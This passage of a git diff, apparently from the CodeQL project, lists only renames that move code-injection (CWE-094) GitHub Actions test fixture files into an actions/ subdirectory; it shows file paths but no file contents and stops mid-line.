a/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml rename to 